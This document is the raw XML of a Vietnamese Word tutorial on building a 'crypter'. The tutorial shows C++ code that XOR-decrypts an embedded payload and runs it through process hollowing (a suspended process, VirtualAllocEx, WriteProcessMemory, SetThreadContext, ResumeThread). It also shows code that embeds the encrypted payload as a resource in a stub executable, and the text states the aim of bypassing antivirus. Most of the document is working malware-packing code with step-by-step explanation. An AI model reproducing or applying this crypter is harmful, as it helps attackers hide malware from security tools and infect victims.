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FF41C" w14:textId="03F0FCE8" w:rsidR="00DE5CC1" w:rsidRDefault="007E3891" w:rsidP="007E38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E3891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phát</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E38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E3891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>triển</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E38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E3891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Crypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D12F94D" w14:textId="14F130FC" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E389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Stub</w:t>
      </w:r>
      <w:r w:rsidR="00291514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74059C56" w14:textId="6646EB07" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E3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place holder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payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFA2E1" w14:textId="3597D957" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E3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C8948D" w14:textId="1F5D792F" w:rsidR="007E3891" w:rsidRDefault="007E3891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Payload.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Hex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27865083" w14:textId="07D899E0" w:rsidR="007E3891" w:rsidRDefault="007E3891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XOR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5BF5D5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t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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t>/  HAM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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t xml:space="preserve"> GIAI MA PAYLOAD BANG XOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2B24B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FF6D7E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DecryptResource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FF6D7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>*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resourcePtr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long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resourceSize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key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long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keySize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56AE866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00677FE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t>    // decrypt the resource raw data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA39BC3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decrypted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new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[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resourceSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="289B5A90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for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long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&lt;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resourceSize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++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6AEE1C8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        decrypted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[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]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resourcePtr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[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]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^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key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4BCA500C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709C98BA" w14:textId="4534473B" w:rsidR="00E0287C" w:rsidRPr="00E0287C" w:rsidRDefault="007E3891" w:rsidP="00E0287C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return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decrypted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1518CF57" w14:textId="40E231DC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11BCE013" w14:textId="6B120D53" w:rsidR="007E3891" w:rsidRDefault="00E0287C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 w:rsidR="007E3891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>àm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E38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389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7E38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3891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7E3891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload.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CB2B3F2" w14:textId="669CE9C1" w:rsidR="00E0287C" w:rsidRPr="00E0287C" w:rsidRDefault="00E0287C" w:rsidP="00E0287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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E0287C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://github.com/Ricky5panish/PE-Runtime-Crypter</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="587C645C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bool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RunPEResource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FF6D7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>*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long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peSize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37230CEB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56B351A3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IMAGE_DOS_HEADER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DOSHeader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384FB1E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IMAGE_NT_HEADERS64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6467F28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IMAGE_SECTION_HEADER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SectionHeader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02CF430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644B99FE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PROCESS_INFORMATION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435F8A6E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STARTUPINFOA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434E70A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3345B16E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void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13B4AA39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14F2F758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currentFilePath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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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MAX_PATH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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807AC0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695E95A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DOSHeader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PIMAGE_DOS_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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6CA0FC97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PIMAGE_NT_HEADERS64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DWORD64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DOSHeader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e_lfanew</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7707188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6644CDA1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if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Signature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IMAGE_NT_SIGNATURE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78918A8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027D471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ZeroMemory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sizeof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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D57E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ZeroMemory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sizeof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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC33B1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0FBF25AC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GetModuleFileNameA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currentFilePath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MAX_PATH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3314E711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lastRenderedPageBreak/>
        <w:t>        // TAO MOT PROCESS MOI DE THUC HIEN INJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F137C4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if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CreateProcessA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currentFilePath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FALSE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CREATE_SUSPENDED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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F523B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3267B7D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50055C58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CONTEXT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78B48B9C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CTX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LPCONTEXT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VirtualAlloc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sizeof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MEM_COMMIT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PAGE_READWRITE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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CD23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            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ContextFlags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CONTEXT_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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FULL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20FA3DA9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3B1C4B85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if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GetThreadContext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LPCONTEXT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)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789FFF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142D679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VirtualAllocEx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</w:p>
    <w:p w14:paraId="2CECFDC7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proofErr w:type="gram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1AD08BEB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</w:p>
    <w:p w14:paraId="4D947AEE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SizeOfImage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543CDE04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MEM_COMMIT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|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MEM_RESERVE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3E1E2C53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PAGE_EXECUTE_READWRITE</w:t>
      </w:r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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2697431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13F4D7FE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WriteProcessMemory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SizeOfHeaders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330EE59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i/>
          <w:iCs/>
          <w:color w:val="6B7678"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>                // THUC HIEN GHI CAC PE SECTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D89D1A7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for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size_t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&lt;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FileHeader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NumberOfSections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++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0B3CD5A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37DE17C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SectionHeader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PIMAGE_SECTION_HEADER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DWORD64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DOSHeader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e_lfanew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264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*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40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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E43F80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708EF53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WriteProcessMemory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</w:p>
    <w:p w14:paraId="3763170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proofErr w:type="gram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6F782B28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DWORD64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SectionHeader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VirtualAddress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</w:p>
    <w:p w14:paraId="701C8AC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DWORD64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SectionHeader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PointerToRawData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</w:p>
    <w:p w14:paraId="1204C7D7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SectionHeader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SizeOfRawData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5C734AF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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E0FA0A0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4891EB1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WriteProcessMemory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</w:p>
    <w:p w14:paraId="20F5EBA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proofErr w:type="gram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155EA5B6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Rdx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10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</w:p>
    <w:p w14:paraId="6B07FF7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</w:p>
    <w:p w14:paraId="2CE196C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8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65635DC9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       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proofErr w:type="gramStart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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3011D903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37BF1EA2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3A06FED3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                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Rcx</w:t>
      </w:r>
      <w:proofErr w:type="spell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DWORD64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+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proofErr w:type="gramStart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AddressOfEntryPoint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396AB38D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SetThreadContext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LPCONTEXT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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D770C54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ResumeThread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6B20BFC4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6269A675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7E3891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WaitForSingleObject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7E3891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INFINITE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0A23B1D8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166A6F0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return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true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0C333FC9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2522B160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3EFB81EC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51B4109A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7E3891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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3891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gramStart"/>
      <w:r w:rsidRPr="007E3891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false</w:t>
      </w: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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="03EDC3EF" w14:textId="77777777" w:rsidR="007E3891" w:rsidRPr="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E3891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7E3891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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A749241" w14:textId="0502E3A3" w:rsidR="00E0287C" w:rsidRDefault="00E0287C" w:rsidP="00E0287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process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‘Suspended’,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payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E15E0" w14:textId="35C60A0D" w:rsidR="00E0287C" w:rsidRPr="00511787" w:rsidRDefault="00E0287C" w:rsidP="00E0287C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CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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currentFilePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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FALSE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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CREATE_SUSPENDED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&amp;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: </w:t>
      </w:r>
      <w:proofErr w:type="spell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Tạo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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một</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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process </w:t>
      </w:r>
      <w:proofErr w:type="spell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mới</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ở </w:t>
      </w:r>
      <w:proofErr w:type="spell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chế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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độ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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suspended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411555D2" w14:textId="77777777" w:rsidR="00511787" w:rsidRPr="00E0287C" w:rsidRDefault="00511787" w:rsidP="00E0287C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291E18A5" w14:textId="006A1959" w:rsidR="00E0287C" w:rsidRPr="00511787" w:rsidRDefault="00E0287C" w:rsidP="00E0287C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 w:rsidRPr="00E0287C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GetThreadContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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E0287C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LPCONTEXT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E0287C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E0287C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</w:t>
      </w:r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Lấy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context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của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Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EEF29B" w14:textId="77777777" w:rsidR="00511787" w:rsidRPr="00E0287C" w:rsidRDefault="00511787" w:rsidP="00E0287C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7EA37C87" w14:textId="5198F496" w:rsidR="00E0287C" w:rsidRPr="00511787" w:rsidRDefault="00E0287C" w:rsidP="00056B0B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 w:rsidRP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VirtualAllocEx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="00511787"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LPVOID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ImageBase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  <w:r w:rsidR="00511787"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SizeOfImage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="00511787"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MEM_COMMIT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|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MEM_RESERVE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="00511787"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PAGE_EXECUTE_READWRITE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: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Thực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hiện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cấp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phát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bộ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nhớ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B30AF7" w14:textId="77777777" w:rsidR="00511787" w:rsidRPr="00511787" w:rsidRDefault="00511787" w:rsidP="00056B0B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06A0A8EC" w14:textId="74B0DE2B" w:rsidR="00511787" w:rsidRPr="00511787" w:rsidRDefault="00511787" w:rsidP="00511787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 w:rsidRP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WriteProcessMemory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hProcess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pImageBase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511787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NtHeader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-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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OptionalHeader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SizeOfHeaders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NULL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Thực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hiện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ghi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dữ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liệu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từ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 w:rsidRPr="00511787"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>decryptedPE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFB270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vào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vùng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nhớ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vừa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được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cấp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phát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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C923F8" w14:textId="77777777" w:rsidR="00511787" w:rsidRPr="00511787" w:rsidRDefault="00511787" w:rsidP="00511787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78F9950A" w14:textId="65B827AE" w:rsidR="00511787" w:rsidRPr="00511787" w:rsidRDefault="00511787" w:rsidP="00511787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 w:rsidRP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SetThreadContext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511787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LPCONTEXT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511787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CTX</w:t>
      </w:r>
      <w:r w:rsidRPr="00511787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))</w:t>
      </w:r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:</w:t>
      </w:r>
      <w:r w:rsidRP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Trỏ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thanh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ghi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RCX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đến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entry point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của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file executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40742D" w14:textId="77777777" w:rsidR="00511787" w:rsidRPr="00511787" w:rsidRDefault="00511787" w:rsidP="00511787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75BE3157" w14:textId="208AEC24" w:rsidR="00511787" w:rsidRPr="00291514" w:rsidRDefault="00291514" w:rsidP="0058314D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R</w:t>
      </w:r>
      <w:r w:rsidRPr="00291514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esumeThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291514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91514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PI</w:t>
      </w:r>
      <w:r w:rsidRPr="00291514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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291514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hThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291514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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00511787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Tiếp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tục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process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bị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suspended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38997CD7" w14:textId="4BDCE23E" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E3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F298BE8" w14:textId="5CECE26A" w:rsidR="007E3891" w:rsidRDefault="007E3891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Hex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F3F64" w14:textId="0E2BE296" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E3891">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E389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A04319" wp14:editId="304D292F">
            <wp:extent cx="5943600" cy="4467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D0ED" w14:textId="5316DF91" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E3891">
      <w:pPr>
        <w:jc w:val="center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Hình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minh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hoạ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FA8380E" w14:textId="5743BE6B" w:rsidR="007E3891" w:rsidRDefault="007E3891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payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254E2F5" w14:textId="33527819" w:rsidR="007E3891" w:rsidRDefault="007E3891" w:rsidP="007E389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Process Hollowing</w:t>
      </w:r>
      <w:r w:rsidR="00291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1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91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1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291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1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291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14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="00291514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2915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93FEC07" w14:textId="0EC26FF7" w:rsidR="00291514" w:rsidRDefault="00291514" w:rsidP="002915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build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stub.exe,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Hex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stub.exe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payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F898C5" w14:textId="7AEDEEDB" w:rsidR="00291514" w:rsidRDefault="00291514" w:rsidP="002915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7E715F" w14:textId="7DBE57B1" w:rsidR="004C7ED2" w:rsidRDefault="004C7ED2" w:rsidP="004C7E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hex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stub.exe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char array.</w:t>
      </w:r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copy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hex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compile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B5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4C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> lag IDE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF0C15" w14:textId="489FFFC8" w:rsidR="00451D0B" w:rsidRDefault="00451D0B" w:rsidP="00451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B0AB71" wp14:editId="34BCC360">
            <wp:extent cx="5935345" cy="33401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1BA4" w14:textId="7A046D44" w:rsidR="00451D0B" w:rsidRPr="00451D0B" w:rsidRDefault="00451D0B" w:rsidP="00451D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copy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25E3A1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unsigned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i/>
          <w:iCs/>
          <w:color w:val="7CD5F1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>char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rawData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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2993764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]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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A67BC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4D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5A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90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03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04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288A85BE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FF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FF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B8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653999F8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40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14A4C4D4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101FBC3B" w14:textId="7777777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80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0E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1F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BA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0E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B4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09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CD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</w:p>
    <w:p w14:paraId="4AB8727D" w14:textId="210CFDE7" w:rsidR="004C7ED2" w:rsidRPr="004C7ED2" w:rsidRDefault="004C7ED2" w:rsidP="004C7ED2">
      <w:p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   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21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B8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01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4C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CD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21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54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68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69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73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20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7ED2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7ED2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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7ED2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70</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7ED2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71168E8A" w14:textId="154E787B" w:rsidR="007E3891" w:rsidRDefault="004C2B50" w:rsidP="004C2B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8AD8585" w14:textId="14820B1D" w:rsidR="004C2B50" w:rsidRDefault="004C2B50" w:rsidP="004C2B5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XOR,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AES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bypass Anti-Virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF705D" w14:textId="6424EE13" w:rsidR="004C2B50" w:rsidRDefault="004C2B50" w:rsidP="004C2B5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Stub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303C16E" w14:textId="77777777" w:rsidR="004C2B50" w:rsidRPr="004C2B50" w:rsidRDefault="004C2B50" w:rsidP="004C2B50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proofErr w:type="spellStart"/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hUpdateRes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2B50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C2B50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BeginUpdateResource</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:r w:rsidRPr="004C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FFED72"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Stub.exe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2B50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FALSE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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F8B1DD" w14:textId="77777777" w:rsidR="004C2B50" w:rsidRPr="004C2B50" w:rsidRDefault="004C2B50" w:rsidP="004C2B50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</w:p>
    <w:p w14:paraId="32831221" w14:textId="77777777" w:rsidR="004C2B50" w:rsidRPr="004C2B50" w:rsidRDefault="004C2B50" w:rsidP="004C2B50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result </w:t>
      </w:r>
      <w:r w:rsidRPr="004C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FF6D7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=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C2B50"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UpdateResourceA</w:t>
      </w:r>
      <w:proofErr w:type="spell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hUpdateRes</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:r w:rsidRPr="004C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FFED72"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>BIN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r w:rsidRPr="004C2B50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MAKEINTRESOURCEA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r w:rsidRPr="004C2B50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132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wLanguage</w:t>
      </w:r>
      <w:proofErr w:type="spell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encrypted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,</w:t>
      </w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C2B50"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  <w:t>filelen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="7C7BA551" w14:textId="2B277B07" w:rsidR="004C2B50" w:rsidRPr="004C2B50" w:rsidRDefault="004C2B50" w:rsidP="004C2B50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="273136"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F2FFF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Ở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đây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phần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</w:t>
      </w:r>
      <w:r w:rsidRPr="004C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FFED72"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>BIN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"</w:t>
      </w:r>
      <w:r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và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gramStart"/>
      <w:r w:rsidRPr="004C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="7CD5F1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>MAKEINTRESOURCEA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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004C2B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="BAA0F8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
      <w:r w:rsidRPr="004C2B50"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>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="8B9798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có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thể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tự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tuỳ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chỉnh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miễn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là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giống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>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="A2E57B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file stub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7941A0" w14:textId="55296BF4" w:rsidR="004C2B50" w:rsidRDefault="007F36BA" w:rsidP="007F36B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crypter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897C241" w14:textId="36A9D50A" w:rsidR="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F36B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crypter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8335DA" w14:textId="3A349204" w:rsidR="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F36B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kéo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payload.exe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4B75D9" w14:textId="08A8471A" w:rsidR="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F3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0BFE6" wp14:editId="3539E238">
            <wp:extent cx="5935345" cy="33401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2DB4" w14:textId="1E9B3C4F" w:rsidR="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F36B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CAAFD81" w14:textId="36CC123C" w:rsidR="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F36BA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7F36BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C:\path\to\crypter.exe C:\path\to\target.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACADB2F" w14:textId="099C19F7" w:rsidR="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F3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CCD8D" wp14:editId="34C52152">
            <wp:extent cx="5935345" cy="33401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3804" w14:textId="78E67BF9" w:rsidR="007F36BA" w:rsidRPr="007F36BA" w:rsidRDefault="007F36BA" w:rsidP="007F36B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Stub.exe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malware.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007F36BA" w:rsidRPr="007F36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5171D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E012ACAE"/>
    <w:lvl w:ilvl="0" w:tplc="22CC49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F1C7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1623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C35002"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42F636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834637690">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2101095095">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1943029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891"/>
    <w:rsid w:val="00291514"/>
    <w:rsid w:val="00451D0B"/>
    <w:rsid w:val="004C2B50"/>
    <w:rsid w:val="004C7ED2"/>
    <w:rsid w:val="00511787"/>
    <w:rsid w:val="007E3891"/>
    <w:rsid w:val="007F36BA"/>
    <w:rsid w:val="00A06219"/>
    <w:rsid w:val="00DE5CC1"/>
    <w:rsid w:val="00E02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6D98D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{76A2BFC8-8253-4D2D-A1C3-9B1A4F9B2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38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28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28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7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8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9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3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Ricky5panish/PE-Runtime-Crypter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6</Pages>
  <Words>908</Words>
  <Characters>5181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Tài Nguyên</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Tài Nguyên</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-27T14:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-27T16:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>